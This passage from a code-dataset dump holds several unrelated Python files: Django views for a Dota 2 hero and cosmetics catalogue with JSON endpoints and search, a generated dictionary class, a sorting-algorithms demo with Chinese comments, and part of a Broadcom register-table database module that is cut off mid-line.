hero.intelligence }\n\t\theroes.append(d)\n\n\tcontext = {\"queryset\": heroes}\n\n\treturn render(request, \"heroes.html\", context)\n\t\ndef heroesAPI(request):\n\t# Query all heroes\n\tall_heroes = Hero.objects.all()\n\n\t# Build a list of hero dictionaries\n\theroes = []\n\tfor hero in all_heroes:\n\t\td = OrderedDict()\n\t\td['name'] = hero.name.replace(\"_\", \" \").title()\n\t\td['type'] = hero.hero_type\n\t\td['strength'] = hero.strength\n\t\td['agility'] = hero.agility\n\t\td['intelligence'] = hero.intelligence\n\t\theroes.append(d)\n\n\tsorted_heroes = sorted(heroes, key=lambda k: k[\"name\"])\n\treturn HttpResponse(json.dumps(sorted_heroes), content_type=\"application/json\")\n\ndef items(request):\n\t\"\"\"\n\t# Build item database\n\tItem.objects.all().delete()\n\n\twith open('itemdigest.json') as data_file: \n\t\tdata = json.load(data_file)\n\t\t\n\tset_data = open('setdigest.json')\n\tdata2 = json.load(set_data)\n\tfor item in data:\n\t\titem_data = data[item]\n\n\t\t# Assign item attributes\n\t\titem_slot = item_data['slot']\n\t\titem_rarity = item_data['rarity'].title()\n\t\titem_set = data2[item_data['item_set']]['legiblename'].replace(\" \", \"_\").lower()\n\t\titem_name = item_data['name'].replace(\" \", \"_\").lower()\n\t\titem_hero = item_data['hero'].replace(\"npc_dota_hero_\", \"\")\n\t\titem_image_url = \"\"\n\n\t\t# Create item entry\n\t\ti = Item.objects.get_or_create(\n\t\t\tname=item_name,\n\t\t\tslot=item_slot,\n\t\t\trarity=item_rarity,\n\t\t\titem_set=item_set,\n\t\t\thero=item_hero,\n\t\t\timage_url=item_image_url\n\t\t)\n\t\n\t# Queen Of Pain name fix\n\titems = list(Item.objects.filter(hero__exact=\"queenofpain\"))\n\tfor item in items:\n\t\titem.hero=\"queen_of_pain\"\n\t\titem.save()\n\titems = list(Item.objects.filter(hero__exact=\"centaur\"))\n\tfor item in items:\n\t\titem.hero=\"centaur_warrunner\"\n\t\titem.save()\n\titems = list(Item.objects.filter(hero__exact=\"windrunner\"))\n\tfor item in items:\n\t\titem.hero=\"windranger\"\n\t\titem.save()\n\titems = list(Item.objects.filter(hero__exact=\"antimage\"))\n\tfor item in items:\n\t\titem.hero=\"anti-mage\"\n\t\titem.save()\n\titems = list(Item.objects.filter(hero__exact=\"skeleton_king\"))\n\tfor item in items:\n\t\titem.hero=\"wraith_king\"\n\t\titem.save()\n\n\t# Update item image urls\n\twith open('itemdigest.json') as data_file: \n\t\tdata = json.load(data_file)\n\n\timage_url_json = open('itemimages.json')\n\titem_image_data = json.load(image_url_json)\n\tfor item in data:\n\t\titem_object = data[item]\n\t\tif (item_object != None):\n\t\t\t_item = Item.objects.get(name__exact=data[item]['name'].replace(\" \", \"_\").lower())\n\t\t\tset_match = item_image_data.get(item, None)\n\t\t\tif (set_match != None):\n\t\t\t\titem_image_url = item_image_data[item]['imageurl']\n\t\t\t\t_item.image_url= item_image_url\n\t\t\t\t_item.save()\n\t\"\"\"\n\n\t# Query all items\n\tall_items = Item.objects.all()\n\n\t# Build a list of item dictionaries\n\titems = []\n\tfor item in all_items:\n\t\td = {\n\t\t\t\"name\" : item.name.replace(\"_\", \" \").title(),\n\t\t\t\"slot\" : item.slot.replace(\"_\", \" \").title(),\n\t\t\t\"rarity\" : item.rarity,\n\t\t\t\"item_set\" : item.item_set.replace(\"_\", \" \").title(),\n\t\t\t\"hero\" : item.hero.replace(\"_\", \" \").title() }\n\n\t\titems.append(d)\n\n\tcontext = {\"queryset\": items}\n\n\treturn render(request, \"items.html\", context)\n\ndef itemsAPI(request):\n\t# Query all items\n\tall_items = Item.objects.all()\n\n\t# Build a list of item dictionaries\n\titems = []\n\tfor item in all_items:\n\t\td = OrderedDict()\n\t\td['name'] = item.name.replace(\"_\", \" \").title()\n\t\td['slot'] = item.slot.replace(\"_\", \" \").title()\n\t\t#d['price'] = item.price\n\t\td['rarity'] = item.rarity\n\t\td['item_set'] = item.item_set.replace(\"_\", \" \").title()\n\t\td['hero'] = item.hero.replace(\"_\", \" \").title()\n\t\titems.append(d)\n\n\tsorted_items = sorted(items, key= lambda k: k[\"name\"])\n\n\treturn HttpResponse(json.dumps(sorted_items), content_type=\"application/json\")\n\n\ndef sets(request):\n\t\"\"\"\n\t# Build set database\n\tSet.objects.all().delete()\n\n\twith open('setdigest.json') as data_file: \n\t\tdata = json.load(data_file)\n\n\tfor set in data:\n\t\tset_data = data[set];\n\t\t\n\t\tset_name = set_data['legiblename'].replace(\" \", \"_\").lower()\n\t\tset_hero = set_data['hero'].replace('npc_dota_hero_', '')\n\t\tset_rarity = set_data['rarity'].title()\n\t\tset_creation_date = set_data['date']\n\t\tnum_pieces = len(set_data['items'])\n\t\tset_image_url = set_data['imageurl']\n\n\t\t# Create set entry\n\t\ts = Set.objects.get_or_create(\n\t\t\tname=set_name,\n\t\t\thero=set_hero,\n\t\t\trarity=set_rarity,\n\t\t\tpieces=num_pieces,\n\t\t\tcreation_date=set_creation_date,\n\t\t\timage_url=set_image_url )\n\t\n\titems = list(Set.objects.filter(hero__exact=\"centaur\"))\n\tfor item in items:\n\t\titem.hero=\"centaur_warrunner\"\n\t\titem.save()\n\titems = list(Set.objects.filter(hero__exact=\"windrunner\"))\n\tfor item in items:\n\t\titem.hero=\"windranger\"\n\t\titem.save()\n\titems = list(Set.objects.filter(hero__exact=\"antimage\"))\n\tfor item in items:\n\t\titem.hero=\"anti-mage\"\n\t\titem.save()\n\titems = list(Set.objects.filter(hero__exact=\"skeleton_king\"))\n\tfor item in items:\n\t\titem.hero=\"wraith_king\"\n\t\titem.save()\n\titems = list(Set.objects.filter(hero__exact=\"queenofpain\"))\n\tfor item in items:\n\t\titem.hero=\"queen_of_pain\"\n\t\titem.save()\n\t\"\"\"\n\t\n\t# Query all sets\n\tall_sets = Set.objects.all()\n\n\t# Build a list of item set dictionaries\n\tsets = []\n\tfor hero_set in all_sets:\n\t\td = {\n\t\t\t\"name\" : hero_set.name.replace(\"_\", \" \").title(),\n\t\t\t\"creation_date\" : hero_set.creation_date,\n\t\t\t\"rarity\" : hero_set.rarity,\n\t\t\t\"pieces\" : hero_set.pieces,\n\t\t\t\"hero\" : hero_set.hero.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : hero_set.image_url }\n\n\t\tsets.append(d)\n\n\tcontext = {\"queryset\": sets}\n\n\treturn render(request, \"sets.html\", context)\n\ndef setsAPI(request):\n\t# Query all sets\n\tall_sets = Set.objects.all()\n\n\t# Build a list of item set dictionaries\n\tsets = []\n\tfor hero_set in all_sets:\n\t\td = OrderedDict()\n\t\td['name'] = hero_set.name.replace(\"_\", \" \").title()\n\t\t#d['price'] = hero_set.price\n\t\td['rarity'] = hero_set.rarity\n\t\td['pieces'] = hero_set.pieces\n\t\td['hero'] = hero_set.hero.replace(\"_\", \" \").title()\n\t\tsets.append(d)\n\n\tsorted_sets = sorted(sets, key= lambda k: k[\"name\"])\n\n\treturn HttpResponse(json.dumps(sorted_sets), content_type=\"application/json\")\n\ndef hero(request):\n\t# Get hero name parameter\n\thero_name = request.GET.get('name')\n\n\t# Query a single hero using hero name\n\thero = Hero.objects.get(name__exact=hero_name)\n\n\t# Get all sets and all items that belong to this hero\n\tsets = Set.objects.filter(hero__exact=hero_name)\n\titems = Item.objects.filter(hero__exact=hero_name)\n\n\t# Create hero dictionary\n\tcontext = {\n\t\t\"name\" : hero.name.replace(\"_\", \" \").title(),\n\t\t\"description\" : hero.description,\n\t\t\"hero_type\" : hero.hero_type,\n\t\t\"strength\" : hero.strength,\n\t\t\"agility\" : hero.agility, \n\t\t\"intelligence\" : hero.intelligence,\n\t\t\"sets\" : sets,\n\t\t\"items\" : items }\n\n\treturn render(request, \"hero.html\", context)\n\ndef heroAPI(request):\n\t# Get hero name parameter\n\thero_name = request.GET.get('name')\n\n\t# Query a single hero using hero name\n\thero = Hero.objects.get(name__exact=hero_name)\n\n\t# Get all sets and all items that belong to this hero\n\tsets = Set.objects.filter(hero__exact=hero_name)\n\titems = Item.objects.filter(hero__exact=hero_name)\n\t\n # Create hero dictionary\n\td = OrderedDict()\n\td['name'] = hero.name.replace(\"_\", \" \").title()\n\td['description'] = hero.description\n\td['hero_type'] = hero.hero_type\n\td['strength'] = hero.strength\n\td['agility'] = hero.agility\n\td['intelligence'] = hero.intelligence\n\n\tsetlist = []\n\tfor hero_set in sets:\n\t\tsd = OrderedDict()\n\t\tsd['name'] = hero_set.name.replace(\"_\", \" \").title()\n\t\t#sd['price'] = hero_set.price\n\t\tsd['rarity'] = hero_set.rarity\n\t\tsd['pieces'] = hero_set.pieces\n\t\tsd['hero'] = hero_set.hero.replace(\"_\", \" \").title()\n\t\tsetlist.append(sd)\n\n\tsorted_sets = sorted(setlist, key= lambda k: k[\"name\"])\n\n\titemlist = []\n\tfor item in items:\n\t\tdi = OrderedDict()\n\t\tdi['name'] = item.name.replace(\"_\", \" \").title()\n\t\tdi['slot'] = item.slot.replace(\"_\", \" \").title()\n\t\t#di['price'] = item.price\n\t\tdi['rarity'] = item.rarity\n\t\tdi['item_set'] = item.item_set.replace(\"_\", \" \").title()\n\t\tdi['hero'] = item.hero.replace(\"_\", \" \").title()\n\t\titemlist.append(di)\n\n\tsorted_items = sorted(itemlist, key= lambda k: k[\"name\"])\n\n\td['sets'] = sorted_sets\n\td['items'] = sorted_items\n\n\treturn HttpResponse(json.dumps(d), content_type=\"application/json\")\n\ndef item(request):\n\t# Get item name parameter\n\titem_name = request.GET.get('name')\n\n\t# Query single item using item name\n\titem = Item.objects.get(name__exact=item_name)\n\n\t# Find 3 other (different) items that belong to the same hero\n\t_other_items = list(Item.objects.filter(hero__exact=item.hero))\n\tother_items = []\n\n\tset_belongs_to = Set.objects.get(name__exact=item.item_set)\n\tset_image_url = set_belongs_to.image_url\n\n\ti = 0\n\titems_added = 0\n\tlength = len(_other_items)\n\twhile(items_added < 3):\n\t\tif (_other_items[i].name != item_name):\n\t\t\tother_items.append(_other_items[i])\n\t\t\titems_added += 1\n\t\ti += 1\n\t\tif (i >= length):\n\t\t\tbreak\n\n\t# Build item dictionary\n\tcontext = {\n\t\t\"name\" : item.name.replace(\"_\",\" \").title(),\n\t\t\"slot\" : item.slot.title(),\n\t\t\"rarity\" : item.rarity,\n\t\t\"item_set\" : item.item_set.replace(\"_\", \" \").title(),\n\t\t\"hero\" : item.hero.replace(\"_\", \" \").title(),\n\t\t\"other_items\" : other_items,\n\t\t\"set_image_url\" : set_image_url,\n\t\t\"item_image_url\" : item.image_url }\n\n\treturn render(request, \"item.html\", context)\n\ndef itemAPI(request):\n\t# Get item name parameter\n\titem_name = request.GET.get('name')\n\n\t# Query single item using item name\n\titem = Item.objects.get(name__exact=item_name)\n\t# Build item dictionary\n\td = OrderedDict()\n\n\td['name'] = item.name.replace(\"_\",\" \").title()\n\td['slot'] = item.slot\n\td['rarity'] = item.rarity\n\td['item_set'] = item.item_set.replace(\"_\", \" \").title()\n\td['hero'] = item.hero.replace(\"_\", \" \").title()\n\n\treturn HttpResponse(json.dumps(d), content_type=\"application/json\")\n\n\ndef set(request):\n\t# Get set name parameter\n\tset_name = request.GET.get('name')\n\n\t# Query single hero set using set name\n\thero_set = Set.objects.get(name__exact=set_name)\n\t# Get all items that comprise this set\n\titems_in_set = Item.objects.filter(item_set__exact=set_name)\n\n\t# Build item set dictionary\n\tcontext = {\n\t\t\"name\" : hero_set.name.replace(\"_\", \" \").title(),\n\t\t\"creation_date\" : hero_set.creation_date,\n\t\t\"rarity\" : hero_set.rarity,\n\t\t\"pieces\" : hero_set.pieces,\n\t\t\"hero\" : hero_set.hero.replace(\"_\", \" \").title(),\n\t\t\"item_set\" : items_in_set,\n\t\t\"set_image_url\" : hero_set.image_url }\n\n\treturn render(request, \"set.html\", context)\n\n\ndef setAPI(request):\n\t# Get set name parameter\n\tset_name = request.GET.get('name')\n\t# Query single hero set using set name\n\thero_set = Set.objects.get(name__exact=set_name)\n\t# Get all items that comprise this set\n\titems_in_set = Item.objects.filter(item_set__exact=set_name)\n\n\t# Build item set dictionary\n\td = OrderedDict()\n\td['name'] = hero_set.name.replace(\"_\", \" \").title()\n\td['creation_date'] = hero_set.creation_date\n\td['rarity'] = hero_set.rarity\n\td['pieces'] = hero_set.pieces\n\td['hero'] = hero_set.hero.replace(\"_\", \" \").title()\n\td['set_image_url'] = hero_set.image_url\n\n\titemlist = []\n\tfor item in items_in_set :\n\t\tdi = OrderedDict()\n\t\tdi['name'] = item.name.replace(\"_\", \" \").title()\n\t\tdi['slot'] = item.slot.replace(\"_\", \" \").title()\n\t\t#di['price'] = item.price\n\t\tdi['rarity'] = item.rarity\n\t\tdi['item_set'] = item.item_set.replace(\"_\", \" \").title()\n\t\tdi['hero'] = item.hero.replace(\"_\", \" \").title()\n\t\titemlist.append(di)\n\n\n\tsorted_items = sorted(itemlist, key= lambda k: k[\"name\"])\n\td['item_set'] = sorted_items\n\treturn HttpResponse(json.dumps(d), content_type=\"application/json\")\n\nignore_words = [\"of\", \"the\", \"from\", \"set\", \"is\", \"if\", \"and\", \"or\", \"but\"]\nfilter_words = [\"more\", \"less\", \"with\",\n\t\t\t\t \"common\", \"uncommon\", \"rare\", \"mythical\", \"legendary\", \"ancient\", \"immortal\", \"arcana\"]\n\ndef search_results(request):\n\tnum_results = 0\n\tsearch_term = request.GET.get('search_term')\n\toriginal_term = search_term\n\t\n\trelevant_heroes_and = []\n\trelevant_heroes_or = []\n\n\trelevant_sets_and = []\n\trelevant_sets_or = []\n\n\trelevant_items_and = []\n\trelevant_items_or = []\n\n\t# Get exact matches first, if they exist\n\tsearch_term = \" \".join(search_term.split()).lower()\n\tsearch_exact = search_term.replace(\" \", \"_\")\n\texact_hero = None\n\texact_item = None\n\texact_set = None\n\ttry:\n\t\texact_hero = Hero.objects.get(name__exact=search_exact)\n\texcept:\n\t\texact_hero = None\n\tif exact_hero == None:\n\t\ttry:\n\t\t\texact_set = Set.objects.get(name__exact=search_exact)\n\t\texcept:\n\t\t\texact_set = None\n\t\tif exact_set == None:\n\t\t\ttry:\n\t\t\t\texact_item = Item.objects.get(name__exact=search_exact)\n\t\t\texcept:\n\t\t\t\texact_item = None\n\n\n\tsearch_terms = search_term.split(\" \")\n\tfor word in ignore_words:\n\t\tsearch_term = search_term.replace(word, \"\")\n\tsearch_term = \" \".join(search_term.split())\n\tsearch_terms = search_term.split(\" \")\n\n\tall_heroes = Hero.objects.all()\n\tall_sets = Set.objects.all()\n\tall_items = Item.objects.all()\n\n\tif (len(search_term) > 1):\n\n\t\t# AND searches (contains all words in the search terms)\n\t\t# =====================================================\n\t\t# Hero AND searches\n\t\tfor hero in all_heroes:\n\t\t\tcontains_all = True\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\t# !!! Get context of match if a match is found\n\t\t\t\tmatch = ((term_original in hero.name and length > 2) or term in hero.description.lower() or term_original in hero.hero_type)\n\t\t\t\t\n\t\t\t\tif not match:\n\t\t\t\t\tcontains_all = False\n\t\t\t\t\tbreak\n\n\t\t\tif contains_all and hero not in relevant_heroes_and and hero != exact_hero:\n\t\t\t\trelevant_heroes_and.append(hero)\n\t\t\t\tnum_results += 1\n\n\t\t# Item AND searches\n\t\tfor item in all_items:\n\t\t\tcontains_all = True\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\t# !!! Get context of match if a match is found\n\t\t\t\tmatch = (length > 2) and (term_original in item.name or term_original in item.hero or term_original in item.rarity.lower())\n\t\t\t\t\n\t\t\t\tif not match:\n\t\t\t\t\tcontains_all = False\n\t\t\t\t\tbreak\n\n\t\t\tif contains_all and item not in relevant_items_and and item != exact_item:\n\t\t\t\trelevant_items_and.append(item)\n\t\t\t\tnum_results += 1\n\n\t\t# Set AND searches\n\t\tfor _set in all_sets:\n\t\t\tcontains_all = True\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\t# !!! Get context of match if a match is found\n\t\t\t\tmatch = (length > 2) and (term_original in _set.name or term_original in _set.hero or term_original in _set.rarity.lower())\n\t\t\t\t\n\t\t\t\tif not match:\n\t\t\t\t\tcontains_all = False\n\t\t\t\t\tbreak\n\n\t\t\tif contains_all and _set not in relevant_sets_and and _set != exact_set:\n\t\t\t\trelevant_sets_and.append(_set)\n\t\t\t\tnum_results += 1\n\n\t\t# ============================================================\n\n\n\t\t# OR searches (contains at least one of the words in the search terms)\n\t\t# ====================================================================\n\n\t\t# Hero OR searches\n\t\tfor hero in all_heroes:\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\tif ((term_original in hero.name and length > 2) or (term in hero.description.lower()) or (term_original in hero.hero_type)):\n\t\t\t\t\tif hero not in relevant_heroes_and and hero != exact_hero:\n\t\t\t\t\t\trelevant_heroes_or.append(hero)\n\t\t\t\t\t\tnum_results += 1\n\t\t\t\t\t\tbreak\n\n\t\t# Item OR searches\n\t\tfor item in all_items:\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\tif (term_original in item.name and length > 2) or (term_original in item.hero and length > 2) or (term_original in item.rarity.lower() and length > 2):\n\t\t\t\t\tif item not in relevant_items_and and item != exact_item:\n\t\t\t\t\t\trelevant_items_or.append(item)\n\t\t\t\t\t\tnum_results += 1\n\t\t\t\t\t\tbreak\n\n\t\t# Set OR searches\n\t\tfor _set in all_sets:\n\t\t\tfor term in search_terms:\n\t\t\t\tterm_original = term\n\t\t\t\tterm = \" \" + term + \" \"\n\t\t\t\tlength = len(term_original)\n\t\t\t\tif (term_original in _set.name and length > 2) or (term_original in _set.hero and length > 2) or term_original in _set.rarity.lower():\n\t\t\t\t\tif _set not in relevant_sets_and and _set != exact_set:\n\t\t\t\t\t\trelevant_sets_or.append(_set)\n\t\t\t\t\t\tnum_results += 1\n\t\t\t\t\t\tbreak\n\n\t\t# =====================================================================\n\n\t# The final results\n\thero_results_and = []\n\thero_results_or = []\n\n\titem_results_and = []\n\titem_results_or = []\n\n\tset_results_and = []\n\tset_results_or = []\n\n\texact_set_result = {}\n\texact_hero_result = {}\n\texact_item_result = {}\n\n\tif (exact_hero != None):\n\t\tnum_results += 1\n\t\texact_hero_result = {\n\t\t\t\"name\" : exact_hero.name.replace(\"_\", \" \").title(),\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\telif (exact_set != None):\n\t\tnum_results += 1\n\t\texact_set_result = {\n\t\t\t\"name\" : exact_set.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : exact_set.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\telif (exact_item != None):\n\t\tnum_results += 1\n\t\texact_item_result = {\n\t\t\t\"name\" : exact_item.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : exact_item.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\n\n\t# Build AND results\n\tfor hero in relevant_heroes_and:\n\t\td = {\n\t\t\t\"name\" : hero.name.replace(\"_\", \" \").title(),\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\thero_results_and.append(d)\n\n\tfor _set in relevant_sets_and:\n\t\td = {\n\t\t\t\"name\" : _set.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : _set.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\tset_results_and.append(d)\n\n\tfor item in relevant_items_and:\n\t\td = {\n\t\t\t\"name\" : item.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : item.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\titem_results_and.append(d)\n\n\n\t# Build OR results\n\tfor hero in relevant_heroes_or:\n\t\td = {\n\t\t\t\"name\" : hero.name.replace(\"_\", \" \").title(),\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\thero_results_or.append(d)\n\n\tfor _set in relevant_sets_or:\n\t\td = {\n\t\t\t\"name\" : _set.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : _set.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\tset_results_or.append(d)\n\n\tfor item in relevant_items_or:\n\t\td = {\n\t\t\t\"name\" : item.name.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : item.image_url,\n\t\t\t\"context\" : \"Search context\"\n\t\t}\n\t\titem_results_or.append(d)\n\n\n\t# Build context\n\tcontext = {\n\t\t\"original_term\" : original_term,\n\t\t\"all_search_terms\" : search_terms,\n\t\t\"hero_results_and\" : hero_results_and,\n\t\t\"set_results_and\" : set_results_and,\n\t\t\"item_results_and\" : item_results_and,\n\t\t\"hero_results_or\" : hero_results_or,\n\t\t\"set_results_or\" : set_results_or,\n\t\t\"item_results_or\" : item_results_or,\n\t\t\"exact_hero_result\" : exact_hero_result,\n\t\t\"exact_set_result\" : exact_set_result,\n\t\t\"exact_item_result\" : exact_item_result,\n\t\t\"num_results\" : num_results,\n\t\t\"num_and_results\" : len(hero_results_and) + len(set_results_and) + len(item_results_and),\n\t\t\"num_or_results\" : len(hero_results_or) + len(set_results_or) + len(item_results_or)\n\t}\n\n\treturn render(request, \"search_results.html\", context)\n\ndef runtests(request):\n #context = {\"results\": tests.runtests()}\n #return render(request, \"runtests.html\", context)\n #return HttpResponse(tests.runtests(), content_type=\"application/json\")\n #test_results = tests.runtests()\n #return HttpResponse(test_results['results'])\n return HttpResponse(tests.runtests())\n\n","sub_path":"dota/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105425793","text":"\n\n#calss header\nclass _MERINGUE():\n\tdef __init__(self,): \n\t\tself.name = \"MERINGUE\"\n\t\tself.definitions = [u'a very light, sweet food made by mixing sugar with egg white (= the clear part) and baking it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_meringue.py","file_name":"_meringue.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"362967307","text":"\"\"\"\n排序\n\"\"\"\ntemp_array = [8, 3, 5, 6, 2, 7, 5, 9, 1]\n\n\n# 直接插入排序\ndef insertSort(array):\n i = 1\n while i < len(array):\n # 对第i个进行插入\n val = array[i]\n # 插入位置 从第i个前一个往前寻找位置\n j = i - 1\n while j >= 0 and array[j] > val:\n # 比当前值大的往后移\n array[j + 1] = array[j]\n j = j - 1\n # 放入正确的位置\n array[j + 1] = val\n i += 1\n print(array)\n return array\n\n\n# 希尔排序\n# 对间隔n个值进行直接插入排序,缩小间隔到1,完成整个排序\ndef shellSort(array):\n # 初始间隔为数组长度的一半\n len_ = int(len(array) / 2)\n while len_ >= 1:\n i = len_\n while i < len(array):\n # 对每组进行直接插入排序\n temp = array[i]\n j = i - len_\n while (j >= 0 and array[j] > temp):\n array[j + len_] = array[j]\n j -= len_\n\n array[j + len_] = temp\n i += 1\n # 缩小间隔\n len_ = int(len_ / 2)\n print(array)\n return array\n\n\n# 快速排序\n\"\"\"\n先从待排序的数组中找出一个数作为基准数(取第一个数即可),然后将原来的数组划分成两部分:\n小于基准数的左子数组和大于等于基准数的右子数组。\n然后对这两个子数组再递归重复上述过程,直到两个子数组的所有数都分别有序。\n最后返回“左子数组” + “基准数” + “右子数组”,即是最终排序好的数组。\n\"\"\"\n\n\n# 实现快排\ndef quicksort(nums):\n if len(nums) <= 1:\n return nums\n\n # 左子数组\n less = []\n # 右子数组\n greater = []\n # 基准数\n base = nums.pop()\n\n # 对原数组进行划分\n for x in nums:\n if x < base:\n less.append(x)\n else:\n greater.append(x)\n\n print(less + [base] + greater)\n # 递归调用\n return quicksort(less) + [base] + quicksort(greater)\n\n\nprint(temp_array)\nprint(insertSort(temp_array))\nprint('-----------')\n# print(shellSort(temp_array))\nprint('-----------')\n# print(quicksort(temp_array))\n","sub_path":"algorithm/sort_.py","file_name":"sort_.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"518711189","text":"\"\"\"\n$Copyright (c) 2019 Broadcom. All rights reserved. The term\n\"Broadcom\" refers to Broadcom Inc. and/or its subsidiaries.\n\nSee LICENSE.rst file in the $NCS_ROOT directory for full license\ninformation.$\n\"\"\"\n\n\"\"\"Database of Tables.\n\nThis module provides a way to add tables to the TablesDB class. The tables\nare usually loaded from a file contains specific tables information.\nThe user can further search whether a table name exists in the database and\nget a specified table information from the database.\n\"\"\"\n\ndef format_val(val):\n \"\"\"Format a scalr value to a string.\n\n If the value is less than 10, the value string will be in decimal format.\n Otherwise the value string will be in hexadecimal format. For the value\n which is greater than 32-bit, an underscore will be used to separate each\n 32-bit word for better readability.\n \"\"\"\n if val < 10:\n return str(val)\n else:\n val_str = \"0x%x\" % (val)\n if len(val_str) <= 10:\n fmt_str = val_str\n else:\n fmt_str = ''\n while len(val_str) > 10:\n if fmt_str == '':\n fmt_str = val_str[-8:]\n else:\n fmt_str = val_str[-8:] + '_' + fmt_str\n val_str = val_str[:-8]\n fmt_str = val_str + '_' + fmt_str\n return fmt_str\n\n\nclass TablesDB():\n 'Tables database class.'\n def __init__(self):\n self.tables = {}\n\n def __table_virtual_field_add(self, field, minval, maxval, tag, **table):\n \"\"\"Add virtual field information.\n\n Fields information are usually fixed when tables are added to the\n database. This method provides a way to add customized field to a\n specified table with virtual field attribute.\n \"\"\"\n table['FIELDS'][field] = {}\n table['FIELDS'][field]['_VIRTUAL'] = 1\n table['FIELDS'][field]['_MINVAL'] = minval\n table['FIELDS'][field]['_MAXVAL'] = maxval\n table['FIELDS'][field]['DESC'] = 'Index'\n if tag is not None:\n table['FIELDS'][field]['TAG'] = tag\n\n def tables_add(self, **tables):\n 'Add tables to the database.'\n for table in tables:\n # Check whether the table is a special function table\n tables[table]['IS_SFT'] = False\n# for field in tables[table]['FIELDS']:\n# if 'TAG' in tables[table]['FIELDS'][field]:\n# if 'bus_select' == tables[table]['FIELDS'][field]['TAG']:\n# #tables[table]['IS_SFT'] = True\n# break\n if '_INDEX' not in tables[table]['FIELDS']:\n if 'MINIDX' in tables[table] and 'MAXIDX' in tables[table]:\n minval = tables[table]['MINIDX']\n maxval = tables[table]['MAXIDX']\n else:\n minval = maxval = 0\n tag = 'direct_index'\n self.__table_virtual_field_add(\n '_INDEX', minval, maxval, tag, **tables[table])\n self.tables.update(tables)\n\n def registers_add(self, **registers):\n 'Add registers as tables to the database.'\n for register in registers:\n # indicate not special Function\n registers[register]['IS_SFT'] = False\n\n for field in registers[register]['FIELDS']:\n # add TAG data\n registers[register]['FIELDS'][field]['TAG'] = 'data'\n\n if '_INDEX' not in registers[register]['FIELDS']:\n if 'MINIDX' in registers[register] and 'MAXIDX' in registers[register]:\n minval = registers[register]['MINIDX']\n maxval = registers[register]['MAXIDX']\n else:\n minval = maxval = 0\n tag = 'direct_index'\n self.__table_virtual_field_add(\n '_INDEX', minval, maxval, tag, **registers[register])\n self.tables.update(registers)\n\n def tables_search(self, name, src = None):\n \"\"\"Search tables in database.\n\n Return the searched result table name(s) in list.\n If the search name is '*', all tables in the database will be returned.\n If the search name starts with '@', an exact match will be used to\n search for the specified name.\n If the search name starts with '^', match-from-start will be used to\n search for the specified table name.\n Otherwise the specified name will be searched in sub-string match.\n \"\"\"\n if name == '*':\n match_str = ''\n elif name[0] == '@':\n match_str = name[1:].lower()\n elif name[0] == '^':\n match_str = name[1:].lower()\n else:\n match_str = name.lower()\n match_tables = []\n for table in self.tables:\n if self.tables[table]['IS_SFT']:\n # Skip special function tables\n continue\n if src and self.tables[table]['OBJ_SOURCE'] != src:\n continue\n if name == '*':\n # Match for all tables\n match_tables.append(table)\n elif name[0] == '@':\n # Exact match\n if match_str == table.lower():\n match_tables.append(table)\n elif name[0] == '^':\n # Match from the start\n if table.lower().startswith(match_str):\n match_tables.append(table)\n else:\n # Substring match\n if match_str in table.lower():\n match_tables.append(table)\n return sorted(match_tables)\n\n def table_get(self, name):\n 'Get a specified table information.'\n lname = name.lower()\n for table in sorted(self.tables):\n if table.lower() == lname:\n return table, self.tables[table]['BM_SID'], self.tables[table]\n return None, None, None\n\n def table_info_get(self, table, fmt=None):\n 'Get a specified table information in formatted string.'\n if table not in self.tables:\n return ''\n # Table name\n info = \"{}\\n\".format(table)\n if fmt == 'brief':\n return info\n\n # display table description\n if 'DESC' in self.tables[table]:\n descr = self.tables[table]['DESC']\n else:\n descr = ''\n info += \" Description: {}\\n\".format(descr)\n \n fields = self.tables[table]['FIELDS']\n info += \" {:d} fields:\\n\".format(len(fields))\n for field in sorted(fields):\n # Field name\n info += \" {}\\n\".format(field)\n\n # display field description\n if 'DESC' in fields[field]:\n descr = fields[field]['DESC']\n else:\n descr = ''\n info += \" Description: {}\\n\".format(descr)\n \n if fmt == 'long':\n # Field information\n if 'TAG' in fields[field]:\n tag = fields[field]['TAG']\n else:\n tag = 'N/A'\n if 'MAXBIT' in fields[field] and 'MINBIT' in fields[field]:\n width = \\\n fields[field]['MAXBIT'] - 